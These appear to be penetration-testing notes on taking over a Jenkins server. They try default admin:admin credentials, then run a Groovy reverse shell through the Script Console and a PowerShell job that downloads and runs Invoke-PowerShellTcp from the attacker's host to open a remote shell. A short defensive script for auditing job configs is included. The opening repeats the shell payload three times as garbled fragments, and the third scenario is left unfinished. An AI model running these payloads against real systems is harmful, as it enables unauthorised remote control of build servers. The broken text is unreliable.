"; int port=; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); "> "; int port=; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); "> "; int port=; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ">
## Login
Default credentials for Jenkins are `admin:admin`. Try them.

# RCE with Admin Account

Access `http://<IP_address>:8080` and check whether the Jenkins login panel is available.
If it is, go to the next step, `Login`.

1. Start a listener: `nc -nvlp 4444`
2. Run the code below via Jenkins.

### First scenario:
1. Go to `Manage Jenkins` -> `Script Console`
2. Add Groovy script to execute this code on Windows machine:

```groovy
Thread.start { String host="<your_machine_IP>"; int port=<your_webserver_port>; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); }
```

3. Run the script; you should have a session open in your listener.

### Second scenario:

- Download: <https://github.com/strikoder/custom_pentest_scripts/blob/main/(Jenkins)%20Invoke-PowerShellTcp.ps1>
- Start a web server: `python -m http.server 80`

1. Go to `New Item` -> `Freestyle job` -> `Execute Windows batch command`.
2. Add PowerShell code:

```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://<your_machine_IP>:<your_webserver_port>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <your_machine_IP> -Port <your_listener_port>
```

3. Save the new job configuration with `Apply`.
4. Run the job by clicking `Build now`; you should have a session open in your listener after the job is completed.
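
From the defender's side, a job configured as in this scenario leaves its command in the job's `config.xml`, so stored build steps can be audited for download-and-execute patterns. The script below is an added example, not part of the original notes: the rule names, the heuristics, the sample config and the address `192.0.2.10` are constructed assumptions, not a complete rule set.

```python
import re
import xml.etree.ElementTree as ET

# Build-step elements Jenkins stores in a freestyle job's config.xml.
STEP_TAGS = {"hudson.tasks.BatchFile", "hudson.tasks.Shell"}

# Assumed heuristics for the pattern shown in the scenario above.
RULES = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "encoded_command": re.compile(r"-enc(odedcommand)?\b", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}", re.I),
}

# Constructed sample: one flagged step, one ordinary build step.
SAMPLE_CONFIG = """<?xml version='1.1' encoding='UTF-8'?>
<project>
  <builders>
    <hudson.tasks.BatchFile>
      <command>powershell iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10:80/Invoke-PowerShellTcp.ps1')</command>
    </hudson.tasks.BatchFile>
    <hudson.tasks.BatchFile>
      <command>msbuild app.sln /p:Configuration=Release</command>
    </hudson.tasks.BatchFile>
  </builders>
</project>"""

def audit_job_config(xml_text):
    """Return [(step_tag, [rule names], command)] for each flagged build step."""
    # Jenkins writes an XML 1.1 declaration that some parsers reject; drop it.
    body = re.sub(r"^\s*<\?xml.*?\?>", "", xml_text, count=1, flags=re.S)
    root = ET.fromstring(body)
    findings = []
    for step in root.iter():
        if step.tag not in STEP_TAGS:
            continue
        command = (step.findtext("command") or "").strip()
        hits = sorted(name for name, rx in RULES.items() if rx.search(command))
        if hits:
            findings.append((step.tag, hits, command))
    return findings

if __name__ == "__main__":
    for tag, hits, command in audit_job_config(SAMPLE_CONFIG):
        print(f"{tag}: {', '.join(hits)}\n  {command}")
```

Run it over every `config.xml` under the Jenkins home's `jobs` directory and review any job it flags together with who last changed it.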

### Third scenario:
1. Go to the build history.
2. Check the projects there.
3. Go to `Configure`.
4. Scroll down to `Build` (where you run the reverse shell).

(check later)